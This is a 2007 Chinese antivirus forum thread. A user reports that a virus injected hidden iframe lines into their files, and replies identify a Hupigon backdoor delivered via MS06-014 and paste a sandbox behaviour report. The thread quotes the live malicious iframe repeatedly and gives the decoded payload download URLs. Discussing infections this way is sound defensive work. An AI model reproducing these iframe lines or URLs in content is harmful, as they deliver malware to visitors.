瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » 不知道什么病毒将我的D盘文件都改了
yn0879 - 2007-11-6 9:07:00
瑞星并没有提示过有病毒,但是D盘里面所有文件都被修改,比如txt文件里面加了:
<iframe src=http://hacktt.512j.com/nana/exe.htm width=0 height=0></iframe>
<iframe src=http://hacktt.512j.com/nana/exe.htm width=0 height=0></iframe>
<iframe src=http://hacktt.512j.com/nana/exe.htm width=0 height=0></iframe>
<iframe src=http://hacktt.512j.com/nana/exe.htm width=0 height=0></iframe>
<iframe src=http://hacktt.512j.com/nana/exe.htm width=0 height=0></iframe>
<iframe src=http://hacktt.512j.com/nana/exe.htm width=0 height=0></iframe>
<iframe src=http://hacktt.512j.com/nana/exe.htm width=0 height=0></iframe>
exe文件用16进制查看软件后面也加了上面的代码,有没有修复的工具

[用户系统信息]Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)
孤独更可靠 - 2007-11-6 9:21:00
汗,那个网址会下载灰鸽子

MS06-14漏洞,10进制加密

解后得:

http://hacktt.512j.com/nana/kdjj.exe

http://hacktt.512j.com/nana/exe.vbs


====================================================

[ DetectionInfo ]
    * Sandbox name: NO_MALWARE
    * Signature name: W32/Hupigon.dam
    * Compressed: NO

[ General information ]
    * Accesses executable file from resource section.
    * Creating several executable files on hard-drive.
    * File length:      293376 bytes.
    * MD5 hash: ab975258b4c0bdc6158152700614214f.

[ Changes to filesystem ]
    * Creates file C:\WINDOWS\DHOP.cn.
    * Creates file C:\WINDOWS\DHOP.DLL.

[ Changes to registry ]
    * Creates key "HKLM\System\CurrentControlSet\Services\Miarosoft Corpoystion".
    * Sets value "ImagePath"="C:\WINDOWS\DHOP.cn" in key "HKLM\System\CurrentControlSet\Services\Miarosoft Corpoystion".
    * Sets value "DisplayName"="DHOP Seystam Applia" in key "HKLM\System\CurrentControlSet\Services\Miarosoft Corpoystion".

[ Process/window information ]
    * Creates a mutex DHOP.cn.
    * Attempts to access service "Miarosoft Corpoystion".
    * Creates service "Miarosoft Corpoystion (DHOP Seystam Applia)" as "C:\WINDOWS\DHOP.cn".

[ Signature Scanning ]
    * C:\WINDOWS\DHOP.cn (293376 bytes) : no signature detection.
    * C:\WINDOWS\DHOP.DLL (246784 bytes) : no signature detection.


看看有没有批量删除文本的工具吧
~~~

无齿的猫 - 2007-11-6 9:31:00
好高深。。看不明白
yn0879 - 2007-11-6 11:42:00
批量删除文本工具只能删除txt、html、c、h、asp等等,如果删除exe的那么文件就挂了
mopery - 2007-11-6 11:47:00
http://www.vaid.cn/blog/read.php?27
1
查看完整版本: 不知道什么病毒将我的D盘文件都改了
© 2000 - 2026 Rising Corp. Ltd.